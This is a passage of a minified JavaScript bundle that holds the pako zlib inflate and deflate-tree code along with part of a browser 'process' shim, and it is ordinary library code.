g.Buf32(32),f=0;f<144;)l.lens[f++]=8;for(;f<256;)l.lens[f++]=9;for(;f<280;)l.lens[f++]=7;for(;f<288;)l.lens[f++]=8;for(M(1,l.lens,0,288,se,0,l.work,{bits:9}),f=0;f<32;)l.lens[f++]=5;M(2,l.lens,0,32,ve,0,l.work,{bits:5}),le=!1}l.lencode=se,l.lenbits=9,l.distcode=ve,l.distbits=5}function z(l,f,A,v){var P,G=l.state;return null===G.window&&(G.wsize=1<<G.wbits,G.wnext=0,G.whave=0,G.window=new g.Buf8(G.wsize)),v>=G.wsize?(g.arraySet(G.window,f,A-G.wsize,G.wsize,0),G.wnext=0,G.whave=G.wsize):((P=G.wsize-G.wnext)>v&&(P=v),g.arraySet(G.window,f,A-v,P,G.wnext),(v-=P)?(g.arraySet(G.window,f,A-v,v,0),G.wnext=v,G.whave=G.wsize):(G.wnext+=P,G.wnext===G.wsize&&(G.wnext=0),G.whave<G.wsize&&(G.whave+=P))),0}F.inflateReset=U,F.inflateReset2=K,F.inflateResetKeep=O,F.inflateInit=function(l){return ee(l,15)},F.inflateInit2=ee,F.inflate=function(l,f){var A,v,P,G,X,L,h,R,J,Z,ue,Ie,Ae,Ue,Xe,He,Be,qe,De,Ve,ze,me,Ke,rt,Ge=0,Qe=new g.Buf8(4),ht=[16,17,18,0,8,7,9,6,10,5,11,4,12,3,13,2,14,1,15];if(!l||!l.state||!l.output||!l.input&&0!==l.avail_in)return p;(A=l.state).mode===D&&(A.mode=13),X=l.next_out,P=l.output,G=l.next_in,v=l.input,R=A.hold,J=A.bits,Z=L=l.avail_in,ue=h=l.avail_out,me=0;e:for(;;)switch(A.mode){case 1:if(0===A.wrap){A.mode=13;break}for(;J<16;){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}if(2&A.wrap&&35615===R){A.check=0,Qe[0]=255&R,Qe[1]=R>>>8&255,A.check=_(A.check,Qe,2,0),R=0,J=0,A.mode=2;break}if(A.flags=0,A.head&&(A.head.done=!1),!(1&A.wrap)||(((255&R)<<8)+(R>>8))%31){l.msg="incorrect header check",A.mode=w;break}if(8!=(15&R)){l.msg="unknown compression method",A.mode=w;break}if(J-=4,ze=8+(15&(R>>>=4)),0===A.wbits)A.wbits=ze;else if(ze>A.wbits){l.msg="invalid window size",A.mode=w;break}A.dmax=1<<ze,l.adler=A.check=1,A.mode=512&R?10:D,R=0,J=0;break;case 2:for(;J<16;){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}if(A.flags=R,8!=(255&A.flags)){l.msg="unknown compression method",A.mode=w;break}if(57344&A.flags){l.msg="unknown header flags set",A.mode=w;break}A.head&&(A.head.text=R>>8&1),512&A.flags&&(Qe[0]=255&R,Qe[1]=R>>>8&255,A.check=_(A.check,Qe,2,0)),R=0,J=0,A.mode=3;case 3:for(;J<32;){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}A.head&&(A.head.time=R),512&A.flags&&(Qe[0]=255&R,Qe[1]=R>>>8&255,Qe[2]=R>>>16&255,Qe[3]=R>>>24&255,A.check=_(A.check,Qe,4,0)),R=0,J=0,A.mode=4;case 4:for(;J<16;){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}A.head&&(A.head.xflags=255&R,A.head.os=R>>8),512&A.flags&&(Qe[0]=255&R,Qe[1]=R>>>8&255,A.check=_(A.check,Qe,2,0)),R=0,J=0,A.mode=5;case 5:if(1024&A.flags){for(;J<16;){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}A.length=R,A.head&&(A.head.extra_len=R),512&A.flags&&(Qe[0]=255&R,Qe[1]=R>>>8&255,A.check=_(A.check,Qe,2,0)),R=0,J=0}else A.head&&(A.head.extra=null);A.mode=6;case 6:if(1024&A.flags&&((Ie=A.length)>L&&(Ie=L),Ie&&(A.head&&(ze=A.head.extra_len-A.length,A.head.extra||(A.head.extra=new Array(A.head.extra_len)),g.arraySet(A.head.extra,v,G,Ie,ze)),512&A.flags&&(A.check=_(A.check,v,Ie,G)),L-=Ie,G+=Ie,A.length-=Ie),A.length))break e;A.length=0,A.mode=7;case 7:if(2048&A.flags){if(0===L)break e;Ie=0;do{ze=v[G+Ie++],A.head&&ze&&A.length<65536&&(A.head.name+=String.fromCharCode(ze))}while(ze&&Ie<L);if(512&A.flags&&(A.check=_(A.check,v,Ie,G)),L-=Ie,G+=Ie,ze)break e}else A.head&&(A.head.name=null);A.length=0,A.mode=8;case 8:if(4096&A.flags){if(0===L)break e;Ie=0;do{ze=v[G+Ie++],A.head&&ze&&A.length<65536&&(A.head.comment+=String.fromCharCode(ze))}while(ze&&Ie<L);if(512&A.flags&&(A.check=_(A.check,v,Ie,G)),L-=Ie,G+=Ie,ze)break e}else A.head&&(A.head.comment=null);A.mode=9;case 9:if(512&A.flags){for(;J<16;){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}if(R!==(65535&A.check)){l.msg="header crc mismatch",A.mode=w;break}R=0,J=0}A.head&&(A.head.hcrc=A.flags>>9&1,A.head.done=!0),l.adler=A.check=0,A.mode=D;break;case 10:for(;J<32;){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}l.adler=A.check=x(R),R=0,J=0,A.mode=11;case 11:if(0===A.havedict)return l.next_out=X,l.avail_out=h,l.next_in=G,l.avail_in=L,A.hold=R,A.bits=J,2;l.adler=A.check=1,A.mode=D;case D:if(5===f||6===f)break e;case 13:if(A.last){R>>>=7&J,J-=7&J,A.mode=27;break}for(;J<3;){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}switch(A.last=1&R,J-=1,3&(R>>>=1)){case 0:A.mode=14;break;case 1:if(ye(A),A.mode=20,6===f){R>>>=2,J-=2;break e}break;case 2:A.mode=17;break;case 3:l.msg="invalid block type",A.mode=w}R>>>=2,J-=2;break;case 14:for(R>>>=7&J,J-=7&J;J<32;){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}if((65535&R)!=(R>>>16^65535)){l.msg="invalid stored block lengths",A.mode=w;break}if(A.length=65535&R,R=0,J=0,A.mode=15,6===f)break e;case 15:A.mode=16;case 16:if(Ie=A.length){if(Ie>L&&(Ie=L),Ie>h&&(Ie=h),0===Ie)break e;g.arraySet(P,v,G,Ie,X),L-=Ie,G+=Ie,h-=Ie,X+=Ie,A.length-=Ie;break}A.mode=D;break;case 17:for(;J<14;){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}if(A.nlen=257+(31&R),J-=5,A.ndist=1+(31&(R>>>=5)),J-=5,A.ncode=4+(15&(R>>>=5)),R>>>=4,J-=4,A.nlen>286||A.ndist>30){l.msg="too many length or distance symbols",A.mode=w;break}A.have=0,A.mode=18;case 18:for(;A.have<A.ncode;){for(;J<3;){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}A.lens[ht[A.have++]]=7&R,R>>>=3,J-=3}for(;A.have<19;)A.lens[ht[A.have++]]=0;if(A.lencode=A.lendyn,A.lenbits=7,me=M(0,A.lens,0,19,A.lencode,0,A.work,Ke={bits:A.lenbits}),A.lenbits=Ke.bits,me){l.msg="invalid code lengths set",A.mode=w;break}A.have=0,A.mode=19;case 19:for(;A.have<A.nlen+A.ndist;){for(;He=(Ge=A.lencode[R&(1<<A.lenbits)-1])>>>16&255,Be=65535&Ge,!((Xe=Ge>>>24)<=J);){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}if(Be<16)R>>>=Xe,J-=Xe,A.lens[A.have++]=Be;else{if(16===Be){for(rt=Xe+2;J<rt;){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}if(R>>>=Xe,J-=Xe,0===A.have){l.msg="invalid bit length repeat",A.mode=w;break}ze=A.lens[A.have-1],Ie=3+(3&R),R>>>=2,J-=2}else if(17===Be){for(rt=Xe+3;J<rt;){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}J-=Xe,ze=0,Ie=3+(7&(R>>>=Xe)),R>>>=3,J-=3}else{for(rt=Xe+7;J<rt;){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}J-=Xe,ze=0,Ie=11+(127&(R>>>=Xe)),R>>>=7,J-=7}if(A.have+Ie>A.nlen+A.ndist){l.msg="invalid bit length repeat",A.mode=w;break}for(;Ie--;)A.lens[A.have++]=ze}}if(A.mode===w)break;if(0===A.lens[256]){l.msg="invalid code -- missing end-of-block",A.mode=w;break}if(A.lenbits=9,me=M(1,A.lens,0,A.nlen,A.lencode,0,A.work,Ke={bits:A.lenbits}),A.lenbits=Ke.bits,me){l.msg="invalid literal/lengths set",A.mode=w;break}if(A.distbits=6,A.distcode=A.distdyn,me=M(2,A.lens,A.nlen,A.ndist,A.distcode,0,A.work,Ke={bits:A.distbits}),A.distbits=Ke.bits,me){l.msg="invalid distances set",A.mode=w;break}if(A.mode=20,6===f)break e;case 20:A.mode=21;case 21:if(L>=6&&h>=258){l.next_out=X,l.avail_out=h,l.next_in=G,l.avail_in=L,A.hold=R,A.bits=J,y(l,ue),X=l.next_out,P=l.output,h=l.avail_out,G=l.next_in,v=l.input,L=l.avail_in,R=A.hold,J=A.bits,A.mode===D&&(A.back=-1);break}for(A.back=0;He=(Ge=A.lencode[R&(1<<A.lenbits)-1])>>>16&255,Be=65535&Ge,!((Xe=Ge>>>24)<=J);){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}if(He&&0==(240&He)){for(qe=Xe,De=He,Ve=Be;He=(Ge=A.lencode[Ve+((R&(1<<qe+De)-1)>>qe)])>>>16&255,Be=65535&Ge,!(qe+(Xe=Ge>>>24)<=J);){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}R>>>=qe,J-=qe,A.back+=qe}if(R>>>=Xe,J-=Xe,A.back+=Xe,A.length=Be,0===He){A.mode=26;break}if(32&He){A.back=-1,A.mode=D;break}if(64&He){l.msg="invalid literal/length code",A.mode=w;break}A.extra=15&He,A.mode=22;case 22:if(A.extra){for(rt=A.extra;J<rt;){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}A.length+=R&(1<<A.extra)-1,R>>>=A.extra,J-=A.extra,A.back+=A.extra}A.was=A.length,A.mode=23;case 23:for(;He=(Ge=A.distcode[R&(1<<A.distbits)-1])>>>16&255,Be=65535&Ge,!((Xe=Ge>>>24)<=J);){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}if(0==(240&He)){for(qe=Xe,De=He,Ve=Be;He=(Ge=A.distcode[Ve+((R&(1<<qe+De)-1)>>qe)])>>>16&255,Be=65535&Ge,!(qe+(Xe=Ge>>>24)<=J);){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}R>>>=qe,J-=qe,A.back+=qe}if(R>>>=Xe,J-=Xe,A.back+=Xe,64&He){l.msg="invalid distance code",A.mode=w;break}A.offset=Be,A.extra=15&He,A.mode=24;case 24:if(A.extra){for(rt=A.extra;J<rt;){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}A.offset+=R&(1<<A.extra)-1,R>>>=A.extra,J-=A.extra,A.back+=A.extra}if(A.offset>A.dmax){l.msg="invalid distance too far back",A.mode=w;break}A.mode=25;case 25:if(0===h)break e;if(A.offset>(Ie=ue-h)){if((Ie=A.offset-Ie)>A.whave&&A.sane){l.msg="invalid distance too far back",A.mode=w;break}Ae=Ie>A.wnext?A.wsize-(Ie-=A.wnext):A.wnext-Ie,Ie>A.length&&(Ie=A.length),Ue=A.window}else Ue=P,Ae=X-A.offset,Ie=A.length;Ie>h&&(Ie=h),h-=Ie,A.length-=Ie;do{P[X++]=Ue[Ae++]}while(--Ie);0===A.length&&(A.mode=21);break;case 26:if(0===h)break e;P[X++]=A.length,h--,A.mode=21;break;case 27:if(A.wrap){for(;J<32;){if(0===L)break e;L--,R|=v[G++]<<J,J+=8}if(l.total_out+=ue-=h,A.total+=ue,ue&&(l.adler=A.check=A.flags?_(A.check,P,ue,X-ue):b(A.check,P,ue,X-ue)),ue=h,(A.flags?R:x(R))!==A.check){l.msg="incorrect data check",A.mode=w;break}R=0,J=0}A.mode=28;case 28:if(A.wrap&&A.flags){for(;J<32;){if(0===L)break e;L--,R+=v[G++]<<J,J+=8}if(R!==(4294967295&A.total)){l.msg="incorrect length check",A.mode=w;break}R=0,J=0}A.mode=29;case 29:me=1;break e;case w:me=-3;break e;case 31:return-4;default:return p}return l.next_out=X,l.avail_out=h,l.next_in=G,l.avail_in=L,A.hold=R,A.bits=J,(A.wsize||ue!==l.avail_out&&A.mode<w&&(A.mode<27||4!==f))&&z(l,l.output,l.next_out,ue-l.avail_out)?(A.mode=31,-4):(ue-=l.avail_out,l.total_in+=Z-=l.avail_in,l.total_out+=ue,A.total+=ue,A.wrap&&ue&&(l.adler=A.check=A.flags?_(A.check,P,ue,l.next_out-ue):b(A.check,P,ue,l.next_out-ue)),l.data_type=A.bits+(A.last?64:0)+(A.mode===D?128:0)+(20===A.mode||15===A.mode?256:0),(0===Z&&0===ue||4===f)&&0===me&&(me=-5),me)},F.inflateEnd=function(l){if(!l||!l.state)return p;var f=l.state;return f.window&&(f.window=null),l.state=null,0},F.inflateGetHeader=function(l,f){var A;return l&&l.state?0==(2&(A=l.state).wrap)?p:(A.head=f,f.done=!1,0):p},F.inflateSetDictionary=function(l,f){var A,v=f.length;return l&&l.state?0!==(A=l.state).wrap&&11!==A.mode?p:11===A.mode&&b(1,f,v,0)!==A.check?-3:z(l,f,v,v)?(A.mode=31,-4):(A.havedict=1,0):p},F.inflateInfo="pako inflate (from Nodeca project)"},9241:(Q,F,E)=>{"use strict";var g=E(4236),b=[3,4,5,6,7,8,9,10,11,13,15,17,19,23,27,31,35,43,51,59,67,83,99,115,131,163,195,227,258,0,0],_=[16,16,16,16,16,16,16,16,17,17,17,17,18,18,18,18,19,19,19,19,20,20,20,20,21,21,21,21,16,72,78],y=[1,2,3,4,5,7,9,13,17,25,33,49,65,97,129,193,257,385,513,769,1025,1537,2049,3073,4097,6145,8193,12289,16385,24577,0,0],M=[16,16,16,16,17,17,18,18,19,19,20,20,21,21,22,22,23,23,24,24,25,25,26,26,27,27,28,28,29,29,64,64];Q.exports=function(p,D,w,x,S,O,U,K){var ee,se,ve,le,ye,z,l,f,A,v=K.bits,P=0,G=0,X=0,L=0,h=0,R=0,J=0,Z=0,ue=0,Ie=0,Ae=null,Ue=0,Xe=new g.Buf16(16),He=new g.Buf16(16),Be=null,qe=0;for(P=0;P<=15;P++)Xe[P]=0;for(G=0;G<x;G++)Xe[D[w+G]]++;for(h=v,L=15;L>=1&&0===Xe[L];L--);if(h>L&&(h=L),0===L)return S[O++]=20971520,S[O++]=20971520,K.bits=1,0;for(X=1;X<L&&0===Xe[X];X++);for(h<X&&(h=X),Z=1,P=1;P<=15;P++)if(Z<<=1,(Z-=Xe[P])<0)return-1;if(Z>0&&(0===p||1!==L))return-1;for(He[1]=0,P=1;P<15;P++)He[P+1]=He[P]+Xe[P];for(G=0;G<x;G++)0!==D[w+G]&&(U[He[D[w+G]]++]=G);if(0===p?(Ae=Be=U,z=19):1===p?(Ae=b,Ue-=257,Be=_,qe-=257,z=256):(Ae=y,Be=M,z=-1),Ie=0,G=0,P=X,ye=O,R=h,J=0,ve=-1,le=(ue=1<<h)-1,1===p&&ue>852||2===p&&ue>592)return 1;for(;;){l=P-J,U[G]<z?(f=0,A=U[G]):U[G]>z?(f=Be[qe+U[G]],A=Ae[Ue+U[G]]):(f=96,A=0),ee=1<<P-J,X=se=1<<R;do{S[ye+(Ie>>J)+(se-=ee)]=l<<24|f<<16|A|0}while(0!==se);for(ee=1<<P-1;Ie&ee;)ee>>=1;if(0!==ee?(Ie&=ee-1,Ie+=ee):Ie=0,G++,0==--Xe[P]){if(P===L)break;P=D[w+U[G]]}if(P>h&&(Ie&le)!==ve){for(0===J&&(J=h),ye+=X,Z=1<<(R=P-J);R+J<L&&!((Z-=Xe[R+J])<=0);)R++,Z<<=1;if(ue+=1<<R,1===p&&ue>852||2===p&&ue>592)return 1;S[ve=Ie&le]=h<<24|R<<16|ye-O|0}}return 0!==Ie&&(S[ye+Ie]=4194304|P-J<<24),K.bits=h,0}},8898:Q=>{"use strict";Q.exports={2:"need dictionary",1:"stream end",0:"","-1":"file error","-2":"stream error","-3":"data error","-4":"insufficient memory","-5":"buffer error","-6":"incompatible version"}},342:(Q,F,E)=>{"use strict";var g=E(4236);function b(Ae){for(var Ue=Ae.length;--Ue>=0;)Ae[Ue]=0}var _=[0,0,0,0,0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,0],y=[0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10,11,11,12,12,13,13],M=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,3,7],p=[16,17,18,0,8,7,9,6,10,5,11,4,12,3,13,2,14,1,15],D=new Array(576);b(D);var w=new Array(60);b(w);var x=new Array(512);b(x);var S=new Array(256);b(S);var O=new Array(29);b(O);var U,K,ee,se=new Array(30);function ve(Ae,Ue,Xe,He,Be){this.static_tree=Ae,this.extra_bits=Ue,this.extra_base=Xe,this.elems=He,this.max_length=Be,this.has_stree=Ae&&Ae.length}function le(Ae,Ue){this.dyn_tree=Ae,this.max_code=0,this.stat_desc=Ue}function ye(Ae){return Ae<256?x[Ae]:x[256+(Ae>>>7)]}function z(Ae,Ue){Ae.pending_buf[Ae.pending++]=255&Ue,Ae.pending_buf[Ae.pending++]=Ue>>>8&255}function l(Ae,Ue,Xe){Ae.bi_valid>16-Xe?(Ae.bi_buf|=Ue<<Ae.bi_valid&65535,z(Ae,Ae.bi_buf),Ae.bi_buf=Ue>>16-Ae.bi_valid,Ae.bi_valid+=Xe-16):(Ae.bi_buf|=Ue<<Ae.bi_valid&65535,Ae.bi_valid+=Xe)}function f(Ae,Ue,Xe){l(Ae,Xe[2*Ue],Xe[2*Ue+1])}function A(Ae,Ue){var Xe=0;do{Xe|=1&Ae,Ae>>>=1,Xe<<=1}while(--Ue>0);return Xe>>>1}function v(Ae,Ue,Xe){var He,Be,qe=new Array(16),De=0;for(He=1;He<=15;He++)qe[He]=De=De+Xe[He-1]<<1;for(Be=0;Be<=Ue;Be++){var Ve=Ae[2*Be+1];0!==Ve&&(Ae[2*Be]=A(qe[Ve]++,Ve))}}function P(Ae){var Ue;for(Ue=0;Ue<286;Ue++)Ae.dyn_ltree[2*Ue]=0;for(Ue=0;Ue<30;Ue++)Ae.dyn_dtree[2*Ue]=0;for(Ue=0;Ue<19;Ue++)Ae.bl_tree[2*Ue]=0;Ae.dyn_ltree[512]=1,Ae.opt_len=Ae.static_len=0,Ae.last_lit=Ae.matches=0}function G(Ae){Ae.bi_valid>8?z(Ae,Ae.bi_buf):Ae.bi_valid>0&&(Ae.pending_buf[Ae.pending++]=Ae.bi_buf),Ae.bi_buf=0,Ae.bi_valid=0}function X(Ae,Ue,Xe,He){var Be=2*Ue,qe=2*Xe;return Ae[Be]<Ae[qe]||Ae[Be]===Ae[qe]&&He[Ue]<=He[Xe]}function L(Ae,Ue,Xe){for(var He=Ae.heap[Xe],Be=Xe<<1;Be<=Ae.heap_len&&(Be<Ae.heap_len&&X(Ue,Ae.heap[Be+1],Ae.heap[Be],Ae.depth)&&Be++,!X(Ue,He,Ae.heap[Be],Ae.depth));)Ae.heap[Xe]=Ae.heap[Be],Xe=Be,Be<<=1;Ae.heap[Xe]=He}function h(Ae,Ue,Xe){var He,Be,qe,De,Ve=0;if(0!==Ae.last_lit)do{He=Ae.pending_buf[Ae.d_buf+2*Ve]<<8|Ae.pending_buf[Ae.d_buf+2*Ve+1],Be=Ae.pending_buf[Ae.l_buf+Ve],Ve++,0===He?f(Ae,Be,Ue):(f(Ae,(qe=S[Be])+256+1,Ue),0!==(De=_[qe])&&l(Ae,Be-=O[qe],De),f(Ae,qe=ye(--He),Xe),0!==(De=y[qe])&&l(Ae,He-=se[qe],De))}while(Ve<Ae.last_lit);f(Ae,256,Ue)}function R(Ae,Ue){var Xe,He,Be,qe=Ue.dyn_tree,De=Ue.stat_desc.static_tree,Ve=Ue.stat_desc.has_stree,ze=Ue.stat_desc.elems,me=-1;for(Ae.heap_len=0,Ae.heap_max=573,Xe=0;Xe<ze;Xe++)0!==qe[2*Xe]?(Ae.heap[++Ae.heap_len]=me=Xe,Ae.depth[Xe]=0):qe[2*Xe+1]=0;for(;Ae.heap_len<2;)qe[2*(Be=Ae.heap[++Ae.heap_len]=me<2?++me:0)]=1,Ae.depth[Be]=0,Ae.opt_len--,Ve&&(Ae.static_len-=De[2*Be+1]);for(Ue.max_code=me,Xe=Ae.heap_len>>1;Xe>=1;Xe--)L(Ae,qe,Xe);Be=ze;do{Xe=Ae.heap[1],Ae.heap[1]=Ae.heap[Ae.heap_len--],L(Ae,qe,1),He=Ae.heap[1],Ae.heap[--Ae.heap_max]=Xe,Ae.heap[--Ae.heap_max]=He,qe[2*Be]=qe[2*Xe]+qe[2*He],Ae.depth[Be]=(Ae.depth[Xe]>=Ae.depth[He]?Ae.depth[Xe]:Ae.depth[He])+1,qe[2*Xe+1]=qe[2*He+1]=Be,Ae.heap[1]=Be++,L(Ae,qe,1)}while(Ae.heap_len>=2);Ae.heap[--Ae.heap_max]=Ae.heap[1],function(Ke,rt){var Ge,Qe,ht,mt,lt,ft,xe=rt.dyn_tree,We=rt.max_code,Je=rt.stat_desc.static_tree,Oe=rt.stat_desc.has_stree,Te=rt.stat_desc.extra_bits,Le=rt.stat_desc.extra_base,$e=rt.stat_desc.max_length,st=0;for(mt=0;mt<=15;mt++)Ke.bl_count[mt]=0;for(xe[2*Ke.heap[Ke.heap_max]+1]=0,Ge=Ke.heap_max+1;Ge<573;Ge++)(mt=xe[2*xe[2*(Qe=Ke.heap[Ge])+1]+1]+1)>$e&&(mt=$e,st++),xe[2*Qe+1]=mt,Qe>We||(Ke.bl_count[mt]++,lt=0,Qe>=Le&&(lt=Te[Qe-Le]),Ke.opt_len+=(ft=xe[2*Qe])*(mt+lt),Oe&&(Ke.static_len+=ft*(Je[2*Qe+1]+lt)));if(0!==st){do{for(mt=$e-1;0===Ke.bl_count[mt];)mt--;Ke.bl_count[mt]--,Ke.bl_count[mt+1]+=2,Ke.bl_count[$e]--,st-=2}while(st>0);for(mt=$e;0!==mt;mt--)for(Qe=Ke.bl_count[mt];0!==Qe;)(ht=Ke.heap[--Ge])>We||(xe[2*ht+1]!==mt&&(Ke.opt_len+=(mt-xe[2*ht+1])*xe[2*ht],xe[2*ht+1]=mt),Qe--)}}(Ae,Ue),v(qe,me,Ae.bl_count)}function J(Ae,Ue,Xe){var He,Be,qe=-1,De=Ue[1],Ve=0,ze=7,me=4;for(0===De&&(ze=138,me=3),Ue[2*(Xe+1)+1]=65535,He=0;He<=Xe;He++)Be=De,De=Ue[2*(He+1)+1],++Ve<ze&&Be===De||(Ve<me?Ae.bl_tree[2*Be]+=Ve:0!==Be?(Be!==qe&&Ae.bl_tree[2*Be]++,Ae.bl_tree[32]++):Ve<=10?Ae.bl_tree[34]++:Ae.bl_tree[36]++,Ve=0,qe=Be,0===De?(ze=138,me=3):Be===De?(ze=6,me=3):(ze=7,me=4))}function Z(Ae,Ue,Xe){var He,Be,qe=-1,De=Ue[1],Ve=0,ze=7,me=4;for(0===De&&(ze=138,me=3),He=0;He<=Xe;He++)if(Be=De,De=Ue[2*(He+1)+1],!(++Ve<ze&&Be===De)){if(Ve<me)do{f(Ae,Be,Ae.bl_tree)}while(0!=--Ve);else 0!==Be?(Be!==qe&&(f(Ae,Be,Ae.bl_tree),Ve--),f(Ae,16,Ae.bl_tree),l(Ae,Ve-3,2)):Ve<=10?(f(Ae,17,Ae.bl_tree),l(Ae,Ve-3,3)):(f(Ae,18,Ae.bl_tree),l(Ae,Ve-11,7));Ve=0,qe=Be,0===De?(ze=138,me=3):Be===De?(ze=6,me=3):(ze=7,me=4)}}b(se);var ue=!1;function Ie(Ae,Ue,Xe,He){var Be,qe,De;l(Ae,0+(He?1:0),3),qe=Ue,De=Xe,G(Be=Ae),z(Be,De),z(Be,~De),g.arraySet(Be.pending_buf,Be.window,qe,De,Be.pending),Be.pending+=De}F._tr_init=function(Ae){ue||(function(){var Ue,Xe,He,Be,qe,De=new Array(16);for(He=0,Be=0;Be<28;Be++)for(O[Be]=He,Ue=0;Ue<1<<_[Be];Ue++)S[He++]=Be;for(S[He-1]=Be,qe=0,Be=0;Be<16;Be++)for(se[Be]=qe,Ue=0;Ue<1<<y[Be];Ue++)x[qe++]=Be;for(qe>>=7;Be<30;Be++)for(se[Be]=qe<<7,Ue=0;Ue<1<<y[Be]-7;Ue++)x[256+qe++]=Be;for(Xe=0;Xe<=15;Xe++)De[Xe]=0;for(Ue=0;Ue<=143;)D[2*Ue+1]=8,Ue++,De[8]++;for(;Ue<=255;)D[2*Ue+1]=9,Ue++,De[9]++;for(;Ue<=279;)D[2*Ue+1]=7,Ue++,De[7]++;for(;Ue<=287;)D[2*Ue+1]=8,Ue++,De[8]++;for(v(D,287,De),Ue=0;Ue<30;Ue++)w[2*Ue+1]=5,w[2*Ue]=A(Ue,5);U=new ve(D,_,257,286,15),K=new ve(w,y,0,30,15),ee=new ve(new Array(0),M,0,19,7)}(),ue=!0),Ae.l_desc=new le(Ae.dyn_ltree,U),Ae.d_desc=new le(Ae.dyn_dtree,K),Ae.bl_desc=new le(Ae.bl_tree,ee),Ae.bi_buf=0,Ae.bi_valid=0,P(Ae)},F._tr_stored_block=Ie,F._tr_flush_block=function(Ae,Ue,Xe,He){var Be,qe,De=0;Ae.level>0?(2===Ae.strm.data_type&&(Ae.strm.data_type=function(Ve){var ze,me=4093624447;for(ze=0;ze<=31;ze++,me>>>=1)if(1&me&&0!==Ve.dyn_ltree[2*ze])return 0;if(0!==Ve.dyn_ltree[18]||0!==Ve.dyn_ltree[20]||0!==Ve.dyn_ltree[26])return 1;for(ze=32;ze<256;ze++)if(0!==Ve.dyn_ltree[2*ze])return 1;return 0}(Ae)),R(Ae,Ae.l_desc),R(Ae,Ae.d_desc),De=function(Ve){var ze;for(J(Ve,Ve.dyn_ltree,Ve.l_desc.max_code),J(Ve,Ve.dyn_dtree,Ve.d_desc.max_code),R(Ve,Ve.bl_desc),ze=18;ze>=3&&0===Ve.bl_tree[2*p[ze]+1];ze--);return Ve.opt_len+=3*(ze+1)+5+5+4,ze}(Ae),(qe=Ae.static_len+3+7>>>3)<=(Be=Ae.opt_len+3+7>>>3)&&(Be=qe)):Be=qe=Xe+5,Xe+4<=Be&&-1!==Ue?Ie(Ae,Ue,Xe,He):4===Ae.strategy||qe===Be?(l(Ae,2+(He?1:0),3),h(Ae,D,w)):(l(Ae,4+(He?1:0),3),function(Ve,ze,me,Ke){var rt;for(l(Ve,ze-257,5),l(Ve,me-1,5),l(Ve,Ke-4,4),rt=0;rt<Ke;rt++)l(Ve,Ve.bl_tree[2*p[rt]+1],3);Z(Ve,Ve.dyn_ltree,ze-1),Z(Ve,Ve.dyn_dtree,me-1)}(Ae,Ae.l_desc.max_code+1,Ae.d_desc.max_code+1,De+1),h(Ae,Ae.dyn_ltree,Ae.dyn_dtree)),P(Ae),He&&G(Ae)},F._tr_tally=function(Ae,Ue,Xe){return Ae.pending_buf[Ae.d_buf+2*Ae.last_lit]=Ue>>>8&255,Ae.pending_buf[Ae.d_buf+2*Ae.last_lit+1]=255&Ue,Ae.pending_buf[Ae.l_buf+Ae.last_lit]=255&Xe,Ae.last_lit++,0===Ue?Ae.dyn_ltree[2*Xe]++:(Ae.matches++,Ue--,Ae.dyn_ltree[2*(S[Xe]+256+1)]++,Ae.dyn_dtree[2*ye(Ue)]++),Ae.last_lit===Ae.lit_bufsize-1},F._tr_align=function(Ae){var Ue;l(Ae,2,3),f(Ae,256,D),16===(Ue=Ae).bi_valid?(z(Ue,Ue.bi_buf),Ue.bi_buf=0,Ue.bi_valid=0):Ue.bi_valid>=8&&(Ue.pending_buf[Ue.pending++]=255&Ue.bi_buf,Ue.bi_buf>>=8,Ue.bi_valid-=8)}},2292:Q=>{"use strict";Q.exports=function(){this.input=null,this.next_in=0,this.avail_in=0,this.total_in=0,this.output=null,this.next_out=0,this.avail_out=0,this.total_out=0,this.msg="",this.state=null,this.data_type=2,this.adler=0}},4155:Q=>{var F,E,g=Q.exports={};function b(){throw new Error("setTimeout has not been defined")}function _(){throw new Error("clearTimeout has not been defined")}function y(K){if(F===setTimeout)return setTimeout(K,0);if((F===b||!F)&&setTimeout)return F=setTimeout,setTimeout(K,0);try{return F(K,0)}catch(ee){try{return F.call(null,K,0)}catch(se){return F.call(this,K,0)}}}!function(){try{F="function"==typeof setTimeout?setTimeout:b}catch(K){F=b}try{E="function"==typeof clearTimeout?clearTimeout:_}catch(K){E=_}}();var M,p=[],D=!1,w=-1;function x(){D&&M&&(D=!1,M.length?p=M.concat(p):w=-1,p.length&&S())}function S(){if(!D){var K=y(x);D=!0;for(var ee=p.length;ee;){for(M=p,p=[];++w<ee;)M&&M[w].run();w=-1,ee=p.length}M=null,D=!1,function(se){if(E===clearTimeout)return clearTimeout(se);if((E===_||!E)&&clearTimeout)return E=clearTimeout,clearTimeout(se);try{E(se)}catch(ve){try{return E.call(null,se)}catch(le){return E.call(this,se)}}}(K)}}function O(K,ee){this.fun=K,this.array=ee}function U(){}g.nextTick=function(K){var ee=new Array(arguments.length-1);if(arguments.length>1)for(var se=1;se<arguments.length;se++)ee[se-1]=arguments[se];p.push(new O(K,ee)),1!==p.length||D||y(S)},O.prototype.run=function(){this.fun.apply(null,this.array)},g.title="browser",g.browser=!0,g.env={},g.argv=[],g.version="",g.versions={},g.on=U,g.addListener=U,g.once=U,g.off=U,g.removeListener=U,g.removeAllListeners=U,g.emit=U,g.prependListener=U,g.prependOnceListener=U,g.listeners=function(K){return[]},g.binding=function(K){throw new Error("process.binding is not 